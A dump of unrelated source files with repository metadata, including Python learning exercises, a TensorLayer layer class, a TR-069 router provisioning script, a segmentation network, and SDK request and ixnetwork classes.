- Add aspect to modules, classes, methods
- Add Add-in
"""
__pyspec = 1
import os
import sys
from pyspec.api import (ModuleAspect, ClassAspect, MethodAspect,
EventHandlerRegister)
def entry_point(method):
"""Notify the target method is special function of pyspec extension.
Method name must be in folloing list:
add_trace() : not implement yet
add_profile() : not implement yet
"""
if "pyspec.addin" in sys.modules:
addin = sys.modules["pyspec.addin"]
addin.AddinLoaderBase.add_entry_point(method)
def event_handler(event_type):
if event_type not in ("init_optparse", "read_option", "on_run_test",
"on_finish_test"):
ValueError("Invalid event type: %s" % event_type)
return EventHandlerRegister(event_type)
| [
"[email protected]"
] | |
d48f2013149fc23461f3610f581057cca53e282a | 0fcc6353edee4eed7a1ea4b1c89a00bfcf03e851 | /PIP/PIPOne.py | 1f984b5b25866edabb8a0c8eb992db91bdd80bb5 | [] | no_license | GANESH0080/Python-Practice-Again | 81d8048c23d338a99bb17fa86a9f87b3057bfe52 | 6565911d14a22d0f33a41b417026c31a0a066be5 | refs/heads/master | 2020-09-20T03:40:45.462869 | 2019-11-27T07:19:24 | 2019-11-27T07:19:24 | 224,368,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | # A package contains all the files you need for a module.
# Modules are Python code libraries you can include in your project.
import camelcase
c = camelcase.CamelCase()
txt = "hello world sds"
print(c.hump(txt)) | [
"[email protected]"
] | |
a1534181fc0cd816f25bc60d6a459e6c443e1409 | d59bad348c88026e444c084e6e68733bb0211bc2 | /poo/todo_v1.py | 8f1eccc7c345536890820623508af901ad2a3a7e | [] | no_license | dersonf/udemy-python | f96ec883decb21a68233b2e158c82db1c8878c7a | 92471c607d8324902902774284f7ca81d2f25888 | refs/heads/master | 2022-09-25T00:18:49.833210 | 2020-06-05T18:18:38 | 2020-06-05T18:18:38 | 262,049,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/python3
from datetime import datetime
class Tarefa:
def __init__(self, descricao):
self.descricao = descricao
self.feito = False
self.criacao = datetime.now()
def concluir(self):
self.feito = True
def __str__(self):
return self.descricao + (' (Concluída)' if self.feito else '')
def main():
casa = []
casa.append(Tarefa('Passar roupa'))
casa.append(Tarefa('Lavar prato'))
casa.append(Tarefa('Lavar roupa'))
[tarefa.concluir() for tarefa in casa if tarefa.descricao == 'Lavar prato']
for tarefa in casa:
print(f'- {tarefa}')
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
d15e95600618fea0344edfd9dd5bab824ec4c949 | 5517b91a4be684d822d35a6c2bd8d21f1098aebc | /tensorlayer/core/engine/layer.py | 0064ab73e3bfb5f364568352e0f5f7aa2181fbd7 | [
"BSD-2-Clause"
] | permissive | zhengruiguo/dragon | 785f52a2eaba0899b2e598a4365adf1b43e07b38 | 3dfb6ea55d90d2fb2da9b1b471f5e1e7d7667810 | refs/heads/master | 2023-05-31T22:48:42.157381 | 2021-06-29T01:59:24 | 2021-06-29T01:59:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,342 | py | # ------------------------------------------------------------
# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.
# Copyright (c) 2016-2018, The TensorLayer contributors.
#
# Licensed under the BSD 2-Clause License.
# You should have received a copy of the BSD 2-Clause License
# along with the software. If not, See,
#
# <https://opensource.org/licenses/BSD-2-Clause>
#
# ------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dragon.core.util import nest
from dragon.vm.tensorlayer.core import activations
from dragon.vm.tensorlayer.core.engine import module
from dragon.vm.tensorlayer.core.engine import node
class Layer(module.Module):
"""The base layer abstraction of a neural network.
It should be subclassed when implementing new types of layers:
```python
class MyLayer(tl.layers.Layer):
def __init__(name=None, act=None):
super(MyLayer, self).__init__(name=name, act=act)
```
"""
def __init__(self, name=None, act=None, *args, **kwargs):
"""Create a new ``Layer``.
Parameters
----------
name : str, optional.
The layer name.
act : str or function, optional
The optional activation.
"""
super(Layer, self).__init__(name=name)
self._built = False
self._nodes = []
self._nodes_fixed = False
self.act = activations.get(act)
@property
def all_weights(self):
"""Return all the weights, both trainable and non-trainable.
Returns
-------
Sequence[dragon.Tensor]
The weights sequence.
"""
return self.trainable_weights + self.nontrainable_weights
@property
def name(self):
"""Return the layer name.
Returns
-------
str
The layer name.
"""
return super(Layer, self).name
@property
def nontrainable_weights(self):
"""Return the non-trainable weights.
Returns
-------
Sequence[dragon.Tensor]
The weights sequence.
"""
return self._nontrainable_weights
@property
def trainable_weights(self):
"""Return the trainable weights.
Returns
-------
Sequence[dragon.Tensor]
The weights sequence.
"""
return self._trainable_weights
@module.Module.training.setter
def training(self, mode):
"""Set the training mode.
Parameters
----------
mode : bool
``True`` for training otherwise evaluation.
"""
self._training = mode
def build(self, input_shapes):
"""Method to define the weights.
Parameters
----------
input_shapes : Sequence[Sequence[int]]
The shape of inputs.
"""
self._built = True
def forward(self, inputs):
"""Method to define the forward operations.
Parameters
----------
inputs : Sequence[dragon.Tensor]
The inputs.
Returns
-------
Sequence[dragon.Tensor]
The outputs.
"""
pass
def _add_node(self, inputs, outputs):
"""Add a layer node for inputs and outputs.
Parameters
----------
inputs : Sequence[dragon.Tensor]
The input tensors.
outputs : Sequence[dragon.Tensor]
The output tensors.
"""
inputs = nest.flatten(inputs)
outputs = nest.flatten(outputs)
input_info = [getattr(e, '_info', [None, None]) for e in inputs]
self._nodes.append(
node.LayerNode(
self,
node_index=len(self._nodes),
in_nodes=[e[0] for e in input_info],
in_tensor_idxes=[e[1] for e in input_info],
in_tensors=inputs,
out_tensors=outputs,
)
)
for idx, tensor in enumerate(outputs):
tensor._info = (self._nodes[-1], idx)
def _fix_nodes(self):
"""Fix layer nodes to stop growing."""
self._nodes_fixed = True
def __call__(self, inputs, **kwargs):
"""The preprocessor for ``self.forward(...)``."""
# Maybe build the layer at the first time.
if not self._built:
input_list = nest.flatten(inputs)
input_shapes = None
if all(hasattr(x, 'shape') for x in input_list):
input_shapes = [x.shape for x in input_list]
if not nest.is_sequence(inputs):
input_shapes = input_shapes[0]
self.build(input_shapes)
# Call the forward implementation to get outputs.
outputs = self.forward(inputs, **kwargs)
# Record the nodes if necessary.
if not self._nodes_fixed:
self._add_node(inputs, outputs)
return outputs
def __delitem__(self, key):
raise TypeError('The Layer API does not allow to use the method: `__delitem__`')
def __repr__(self):
return 'Layer'
def __setitem__(self, key, item):
raise TypeError('The Layer API does not allow to use the method: `__setitem__`')
| [
"[email protected]"
] | |
ee3872bc65c7073fd639374827e837a332116b94 | caf0ba85f1c7a2b7208e7f0acebb3c047b17b0ba | /1-py/venv/PY_17_ARCHIVOS_XML.py | a877a3074ae9230424db9c4e7b17404af91df9ce | [] | no_license | JAreina/python | 12ca9bd5467420a813ac3f33b0adba6cd492f855 | 3b9ac8d37ab2abe70e34043857f96a76c19468c8 | refs/heads/master | 2020-03-22T07:57:31.675271 | 2018-09-12T06:38:49 | 2018-09-12T06:38:49 | 139,735,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | py | from xml.etree.ElementTree import parse
'''
archvios XML
'''
documento = parse("nuevo.xml")
print(documento.getroot())
iterador = documento.getiterator()
print(iterador)
for i in iterador:
print(i)
print(i.text)
for elemento in documento.findall("funcion"):
print(elemento.text) | [
"[email protected]"
] | |
dcf41d4448f201f32272548ecf6d906cbe6c76bd | 6d5545faf2af0a6bb565ad698bb824110b40e121 | /WEBAPP/MLmodel/inception_client.py.runfiles/org_tensorflow/tensorflow/contrib/autograph/utils/__init__.py | c41b3a2134418498fd492b8af9d7642dc620e477 | [
"MIT"
] | permissive | sunsuntianyi/mlWebApp_v2 | abb129cd43540b1be51ecc840127d6e40c2151d3 | 5198685bf4c4e8973988722282e863a8eaeb426f | refs/heads/master | 2021-06-23T22:02:38.002145 | 2020-11-20T02:17:43 | 2020-11-20T02:17:43 | 162,194,249 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | /private/var/tmp/_bazel_tianyi/f29d1e61689e4e4b318f483932fff4d0/external/org_tensorflow/tensorflow/contrib/autograph/utils/__init__.py | [
"[email protected]"
] | |
186e91145d97be619a36109db424d79ee9be5e48 | 0c1d6b8dff8bedfffa8703015949b6ca6cc83f86 | /lib/worklists/operator/CT/v4.0/business/LAN_4+1/WAN_BridgedIPv4v6_IPTV/script.py | 455937edfeda08293cde9b096481beebe08773d0 | [] | no_license | samwei8/TR069 | 6b87252bd53f23c37186c9433ce4d79507b8c7dd | 7f6b8d598359c6049a4e6cb1eb1db0899bce7f5c | refs/heads/master | 2021-06-21T11:07:47.345271 | 2017-08-08T07:14:55 | 2017-08-08T07:14:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,049 | py | #coding:utf-8
# -----------------------------rpc --------------------------
import os
import sys
#debug
DEBUG_UNIT = False
if (DEBUG_UNIT):
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1)
parent3 = os.path.dirname(parent2)
parent4 = os.path.dirname(parent3) # tr069v3\lib
parent5 = os.path.dirname(parent4) # tr069v3\
sys.path.insert(0, parent4)
sys.path.insert(0, os.path.join(parent4, 'common'))
sys.path.insert(0, os.path.join(parent4, 'worklist'))
sys.path.insert(0, os.path.join(parent4, 'usercmd'))
sys.path.insert(0, os.path.join(parent5, 'vendor'))
from TR069.lib.common.event import *
from TR069.lib.common.error import *
from time import sleep
import TR069.lib.common.logs.log as log
g_prj_dir = os.path.dirname(__file__)
parent1 = os.path.dirname(g_prj_dir)
parent2 = os.path.dirname(parent1) # dir is system
try:
i = sys.path.index(parent2)
if (i !=0):
# stratege= boost priviledge
sys.path.pop(i)
sys.path.insert(0, parent2)
except Exception,e:
sys.path.insert(0, parent2)
import _Common
reload(_Common)
from _Common import *
import _IPV6WANSetUP
reload(_IPV6WANSetUP)
from _IPV6WANSetUP import V6WANSetUP
import _IPV6IPTVEnable
reload(_IPV6IPTVEnable)
from _IPV6IPTVEnable import IPV6IPTVEnable
def test_script(obj):
"""
"""
sn = obj.sn # 取得SN号
DeviceType = "LAN" # 绑定tr069模板类型.只支持ADSL\LAN\EPON三种
AccessMode1_1 = 'PPPoE_Bridged' # 用于双栈WAN, WAN接入模式,可选PPPoE_Bridge,PPPoE,DHCP,Static
AccessMode1_2 = ''
AccessMode2 = 'PPPoE_Bridged' # 用于IPTV, WAN接入模式,可选PPPoE_Bridge,PPPoE,DHCP,Static
rollbacklist = [] # 存储工单失败时需回退删除的实例.目前缺省是不开启回退
# 初始化日志
obj.dict_ret.update(str_result=u"开始执行工单:%s........\n" %
os.path.basename(os.path.dirname(__file__)))
# INTERNET data
PVC_OR_VLAN1 = obj.dict_data.get("PVC_OR_VLAN1")[0] # ADSL上行只关心PVC值,LAN和EPON上行则关心VLAN值
X_CT_COM_LanInterface1 = obj.dict_data.get("X_CT_COM_LanInterface1")[0]
#X_CT_COM_ServiceList1 = obj.dict_data.get("X_CT_COM_ServiceList1")[0]
ret, X_CT_COM_LanInterface1 = ParseLANName(X_CT_COM_LanInterface1)
if ret == ERR_FAIL:
info = u'输入的X_CT_COM_LanInterface参数错误'
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
# 强制将使能动作与参数一起下发
WANEnable_Switch1 = False
# IPTV data
PVC_OR_VLAN2 = obj.dict_data.get("PVC_OR_VLAN2")[0] # ADSL上行只关心PVC值,LAN和EPON上行则关心VLAN值
X_CT_COM_MulticastVlan = obj.dict_data.get("X_CT_COM_MulticastVlan")[0] # 新增公共组播VLAN的下发
# WANPPPConnection节点参数
# 注意:X_CT-COM_IPMode节点有些V4版本没有做,所以不能使能为1.实际贝曼工单也是没有下发的
LAN2 = 'InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2' # 绑字到LAN2
WANEnable_Switch2 = 1
# PVC_OR_VLAN
if PVC_OR_VLAN1 == "":
PVC_OR_VLAN1_flag = 0
else:
PVC_OR_VLAN1_flag = 1
if PVC_OR_VLAN2 == "":
PVC_OR_VLAN2_flag = 0
else:
PVC_OR_VLAN2_flag = 1
# INTERNET dict data
dict_wanlinkconfig1 = {'X_CT-COM_Enable':[0, 'Null'],
'X_CT-COM_Mode':[PVC_OR_VLAN1_flag, '2'],
'X_CT-COM_VLANIDMark':[PVC_OR_VLAN1_flag, PVC_OR_VLAN1],
'X_CT-COM_802-1pMark':[1, '0']}
# WANPPPConnection节点参数
# 注意:X_CT-COM_IPMode节点有些V4版本没有做,所以不能使能为1.实际贝曼工单也是没有下发的
dict_wanpppconnection1_1 = {'Enable':[1, '1'],
'ConnectionType':[1, 'PPPoE_Bridged'],
'Name':[0, 'Null'],
'Username':[0, 'Null'],
'Password':[0, 'Null'],
'X_CT-COM_LanInterface':[1, X_CT_COM_LanInterface1],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null'],
'X_CT-COM_ServiceList':[1, "INTERNET"],
'X_CT-COM_IPMode':[1, '3'],
'X_CT-COM_IPv6IPAddressOrigin':[0,'Null'],
'X_CT-COM_IPv6PrefixOrigin':[0,'Null'],
'X_CT-COM_IPv6PrefixDelegationEnabled':[0,'Null'],
'X_CT-COM_MulticastVlan':[0, 'Null']}
dict_wanipconnection1_1 = {}
dict_wanpppconnection1_2 = {}
dict_wanipconnection1_2 = {}
dict_v6config = {}
dict_v6prefixinformation = {}
dict_dhcpv6server = {}
dict_routeradvertisement = {}
# IPTV dict data
dict_wanlinkconfig2 = {'X_CT-COM_Enable':[0, 'Null'],
'X_CT-COM_Mode':[PVC_OR_VLAN2_flag, '2'],
'X_CT-COM_VLANIDMark':[PVC_OR_VLAN2_flag, PVC_OR_VLAN2],
'X_CT-COM_802-1pMark':[1, '0']}
if X_CT_COM_MulticastVlan == "":
X_CT_COM_MulticastVlan_flag = 0
else:
X_CT_COM_MulticastVlan_flag = 1
dict_wanpppconnection2 = {
'ConnectionType':[1, 'PPPoE_Bridged'],
'Name':[0, 'Null'],
'Username':[0, 'Null'],
'Password':[0, 'Null'],
'X_CT-COM_LanInterface':[1, LAN2],
'X_CT-COM_ServiceList':[1, 'OTHER'],
'X_CT-COM_LanInterface-DHCPEnable':[0, 'Null'],
'X_CT-COM_IPMode':[0, 'Null'],
'X_CT-COM_MulticastVlan':[X_CT_COM_MulticastVlan_flag, X_CT_COM_MulticastVlan],
'Enable':[1, '1']}
dict_wanipconnection2 = {}
dict_root = {'IGMPEnable':[1, '1'],
'ProxyEnable':[0, 'Null'],
'SnoopingEnable':[0, 'Null']}
# WANIPConnection节点参数
# 查询或开通PPPoE的IP_Routed上网
ret, ret_data = V6WANSetUP(obj,sn, WANEnable_Switch1, DeviceType,
AccessMode1_1, PVC_OR_VLAN1, AccessMode1_2, dict_wanlinkconfig1,
dict_wanpppconnection1_1, dict_wanipconnection1_1,
dict_wanpppconnection1_2,dict_wanipconnection1_2,
dict_v6config,dict_v6prefixinformation,
dict_dhcpv6server,dict_routeradvertisement,
change_account=0,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
info = u'开通上网失败\n'
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
# 开通PPPoE_Bridged的OTHER桥IPTV,并绑定到LAN2
ret, ret_data = IPV6IPTVEnable(obj, sn, WANEnable_Switch2, DeviceType,
AccessMode2, PVC_OR_VLAN2, dict_root,
dict_wanlinkconfig2, dict_wanpppconnection2,
dict_wanipconnection2, change_account=1,
rollbacklist=rollbacklist)
# 将工单脚本执行结果返回到OBJ的结果中
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data)
# 如果执行失败,统一调用回退机制(缺省是关闭的)
if ret == ERR_FAIL:
ret_rollback, ret_data_rollback = rollback(sn, rollbacklist, obj)
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + ret_data_rollback)
info = u"工单:%s执行结束\n" % os.path.basename(os.path.dirname(__file__))
obj.dict_ret.update(str_result=obj.dict_ret["str_result"] + info)
return ret
if __name__ == '__main__':
log_dir = g_prj_dir
log.start(name="nwf", directory=log_dir, level="DebugWarn")
log.set_file_id(testcase_name="tr069")
obj = MsgWorklistExecute(id_="1")
obj.sn = "201303051512"
dict_data= {"PVC_OR_VLAN1":("PVC:0/65","1"),
"Username":("tw1","2"),"Password":("tw1","3"),
"IPv6IPAddressOrigin":("AutoConfigured","5"),
"IPv6PrefixOrigin":("PrefixDelegation","6"),
"IPv6PrefixMode":("WANDelegated","7"),
"IPv6Prefix":("2001:1:2:3::/64","8"),
"IPv6DNSConfigType":("WANConnection","9"),
"IPv6DNSServers":("fe80::1","10"),
"DHCPv6ServerEnable":("1","11"),
"DHCPv6ServerMinAddress":("0:0:0:1","12"),
"DHCPv6ServerMaxAddress":("ffff:ffff:ffff:fffe","13"),
"RouterAdvEnable":("1","14"),
"AdvManagedFlag":("1","15"),
"AdvOtherConfigFlag":("1","16"),
"PVC_OR_VLAN2":("","17"),
"ProxyServer":("172.24.55.67","19"),
"ProxyServerPort":("5060","20"),
"RegistrarServer":("172.24.55.67","21"),
"RegistrarServerPort":("5060","22"),
"OutboundProxy":("0.0.0.0","23"),
"OutboundProxyPort":("5060","24"),
"X_CT_COM_Standby_ProxyServer":("172.24.55.67","25"),
"X_CT_COM_Standby_ProxyServerPort":("5060","26"),
"X_CT_COM_Standby_RegistrarServer":("172.24.55.67","27"),
"X_CT_COM_Standby_RegistrarServerPort":("5060","28"),
"X_CT_COM_Standby_OutboundProxy":("0.0.0.0","29"),
"X_CT_COM_Standby_OutboundProxyPort":("5060","30"),
"AuthUserName1":("55511021","31"),
"AuthPassword1":("55511021","32")}
obj.dict_data = dict_data
try:
ret = test_script(obj)
if ret == ERR_SUCCESS:
print u"测试成功"
else:
print u"测试失败"
print "****************************************"
print obj.dict_ret["str_result"]
except Exception, e:
print u"测试异常" | [
"[email protected]"
] | |
c430b520d8077c08d1f2dad4a4e255d079ae8da2 | 4546398a18590e4e182629fb55d185547dd6df0a | /2015/beta/problems/demantar/input_format_validators/validator.py | bff24165ef084214f3ab7989be22df6477c131b1 | [] | no_license | ForritunarkeppniFramhaldsskolanna/Keppnir | 352341fa97c6349af65b513c03171f3e706f7db2 | 65c8eb5358d8a49f956edf76c2d47b9372accc3c | refs/heads/master | 2023-04-28T15:33:36.396225 | 2023-04-23T15:00:15 | 2023-04-23T15:00:15 | 78,303,702 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | import sys
import re
import string
s = sys.stdin.readline()
assert re.match('^[0-9]+ .\n$', s)
s = s[:-1]
n, c = s.split(' ', 1)
n = int(n)
assert 1 <= n <= 500
assert len(c) == 1
assert c in string.printable and c not in string.whitespace
assert sys.stdin.read() == ''
sys.exit(42)
| [
"[email protected]"
] | |
3ac2d633ab9dcb1d8b617c819a20e45565fc5fa4 | d01f9ff2d7ba3c7c99158678adeaf082f3f15dbc | /model/cpn/ablation_study/cityscapes.cpn.R101_v1c.v2/network.py | e1e8c9f9b049a87dd56a998ac77b7ba565d5ba93 | [
"MIT"
] | permissive | akinoriosamura/TorchSeg-mirror | d8e76d99e80d55c2555f4f8f7a7fc3f30ef5dec4 | 34033fe85fc24015bcef7a92aad39d2a25a001a5 | refs/heads/master | 2021-06-18T15:47:00.946788 | 2019-10-26T04:46:07 | 2019-10-26T04:46:07 | 217,657,156 | 0 | 0 | MIT | 2021-06-08T20:36:44 | 2019-10-26T04:46:39 | Python | UTF-8 | Python | false | false | 7,740 | py | # encoding: utf-8
from functools import partial
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
from config import config
from base_model import resnet101
from seg_opr.seg_oprs import ConvBnRelu
from seg_opr.loss_opr import AntimagnetLossv6
class CPNet(nn.Module):
def __init__(self, out_planes, criterion, pretrained_model=None,
norm_layer=nn.BatchNorm2d):
super(CPNet, self).__init__()
self.backbone = resnet101(pretrained_model, norm_layer=norm_layer,
bn_eps=config.bn_eps,
bn_momentum=config.bn_momentum,
deep_stem=True, stem_width=64)
self.generate_dilation(self.backbone.layer3, dilation=2)
self.generate_dilation(self.backbone.layer4, dilation=4,
multi_grid=[1, 2, 4])
self.business_layer = []
self.context = ObjectContext(2048, 512, norm_layer)
self.head_layer = nn.Sequential(
ConvBnRelu(2048 + 1024, 512, 3, 1, 1,
has_bn=True,
has_relu=True, has_bias=False, norm_layer=norm_layer),
nn.Dropout2d(0.1, inplace=False),
nn.Conv2d(512, out_planes, kernel_size=1)
)
self.aux_layer = nn.Sequential(
ConvBnRelu(1024, 512, 3, 1, 1,
has_bn=True,
has_relu=True, has_bias=False, norm_layer=norm_layer),
nn.Dropout2d(0.1, inplace=False),
nn.Conv2d(512, out_planes, kernel_size=1)
)
self.business_layer.append(self.context)
self.business_layer.append(self.head_layer)
self.business_layer.append(self.aux_layer)
self.criterion = criterion
self.bce_criterion = nn.BCELoss(reduction='mean')
self.antimagnet_criterion = AntimagnetLossv6()
def forward(self, data, label=None, aux_label=None):
blocks = self.backbone(data)
fm, intra_sim_map = self.context(blocks[-1])
fm = self.head_layer(fm)
fm = F.interpolate(fm, scale_factor=8, mode='bilinear',
align_corners=True)
softmax_fm = F.softmax(fm, dim=1)
aux_fm = self.aux_layer(blocks[-2])
aux_fm = F.interpolate(aux_fm, scale_factor=8, mode='bilinear',
align_corners=True)
if label is not None:
main_loss = self.criterion(fm, label)
aux_loss = self.criterion(aux_fm, label)
intra_sim_loss = self.bce_criterion(intra_sim_map, aux_label)
antimagnet_loss = self.antimagnet_criterion(intra_sim_map,
aux_label)
loss = main_loss + 0.4 * aux_loss + intra_sim_loss + antimagnet_loss
return loss
return softmax_fm
def generate_dilation(self, module, dilation, multi_grid=None):
for idx, block in enumerate(module):
if multi_grid is None:
grid = 1
else:
grid = multi_grid[idx % len(multi_grid)]
dilation = dilation * grid
block.apply(partial(self._nostride_dilate, dilate=dilation))
@staticmethod
def _nostride_dilate(m, dilate):
if isinstance(m, nn.Conv2d):
if m.stride == (2, 2):
m.stride = (1, 1)
if m.kernel_size == (3, 3):
m.dilation = (dilate // 2, dilate // 2)
m.padding = (dilate // 2, dilate // 2)
else:
if m.kernel_size == (3, 3):
m.dilation = (dilate, dilate)
m.padding = (dilate, dilate)
class SymmetricConv(nn.Module):
def __init__(self, in_channels, ksize, norm_layer=nn.BatchNorm2d):
super(SymmetricConv, self).__init__()
padding = ksize // 2
self.t1 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(ksize, 1),
stride=1, padding=(padding, 0))
self.t2 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(1, ksize),
stride=1, padding=(0, padding))
self.p1 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(1, ksize),
stride=1, padding=(0, padding))
self.p2 = nn.Conv2d(in_channels, in_channels, groups=in_channels,
kernel_size=(ksize, 1),
stride=1, padding=(padding, 0))
self.bn = norm_layer(in_channels)
self.relu = nn.ReLU()
def forward(self, x):
x1 = self.t1(x)
x1 = self.t2(x1)
x2 = self.p1(x)
x2 = self.p2(x2)
output = self.relu(self.bn(x1 + x2))
return output
class ObjectContext(nn.Module):
def __init__(self, in_channels, inner_channel, norm_layer=nn.BatchNorm2d):
super(ObjectContext, self).__init__()
self.in_channels = in_channels
self.inner_channel = inner_channel
self.reduce_conv = ConvBnRelu(self.in_channels, self.inner_channel,
3, 1, 1,
has_bn=True, has_relu=True,
has_bias=False, norm_layer=norm_layer)
self.intra_similarity_branch = nn.Sequential(
SymmetricConv(self.inner_channel, 11, norm_layer),
nn.Conv2d(self.inner_channel, config.prior_size ** 2, 1, 1, 0,
groups=16, bias=False),
norm_layer(config.prior_size ** 2)
)
self.intra_post_conv = ConvBnRelu(self.inner_channel,
self.inner_channel,
1, 1, 0, has_bn=True, has_relu=True,
has_bias=False, norm_layer=norm_layer)
self.inter_post_conv = ConvBnRelu(self.inner_channel,
self.inner_channel,
1, 1, 0, has_bn=True, has_relu=True,
has_bias=False, norm_layer=norm_layer)
def forward(self, x):
b, h, w = x.size(0), x.size(2), x.size(3)
value = self.reduce_conv(x)
intra_similarity_map = self.intra_similarity_branch(value)
intra_similarity_map = intra_similarity_map.view(b, h * w, -1)
intra_similarity_map = intra_similarity_map.permute(0, 2, 1)
intra_similarity_map = torch.sigmoid(intra_similarity_map)
inter_similarity_map = 1 - intra_similarity_map
value = value.view(b, self.inner_channel, -1)
value = value.permute(0, 2, 1)
intra_context = torch.bmm(intra_similarity_map, value)
intra_context = intra_context.div(config.prior_size ** 2)
intra_context = intra_context.permute(0, 2, 1).contiguous()
intra_context = intra_context.view(b, self.inner_channel, *x.size()[2:])
intra_context = self.intra_post_conv(intra_context)
inter_context = torch.bmm(inter_similarity_map, value)
inter_context = inter_context.div(config.prior_size ** 2)
inter_context = inter_context.permute(0, 2, 1).contiguous()
inter_context = inter_context.view(b, self.inner_channel, *x.size()[2:])
inter_context = self.inter_post_conv(inter_context)
output = torch.cat([x, intra_context, inter_context], dim=1)
return output, intra_similarity_map
if __name__ == "__main__":
model = PSPNet(150, None)
print(model)
| [
"[email protected]"
] | |
5c12ebb7f61530f208ff64d567d216355c3961ed | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-ens/aliyunsdkens/request/v20171110/DescribeEnsNetLevelRequest.py | 5057ac9282727831a8f7d7371a4b4a15f5899cdf | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 1,014 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeEnsNetLevelRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ens', '2017-11-10', 'DescribeEnsNetLevel','ens')
self.set_method('POST')
| [
"[email protected]"
] | |
9ba229cd899e1c098ef7cc34a315439025460288 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/tlvprofile/subtlv_7c94061598b794f7b720de3bb85f6cdb.py | e5a86fab5e949b33adb3d3d1d06e318bcc1731c0 | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,055 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class SubTlv(Base):
"""Sub Tlv container
The SubTlv class encapsulates a list of subTlv resources that are managed by the system.
A list of resources can be retrieved from the server using the SubTlv.find() method.
"""
__slots__ = ()
_SDM_NAME = 'subTlv'
_SDM_ATT_MAP = {
'Description': 'description',
'EnablePerSession': 'enablePerSession',
'IsEnabled': 'isEnabled',
'Name': 'name',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(SubTlv, self).__init__(parent, list_op)
@property
def Value(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tlvprofile.value_ac1d7b13584a86b9cf1c28dca3390bca.Value): An instance of the Value class
Raises
------
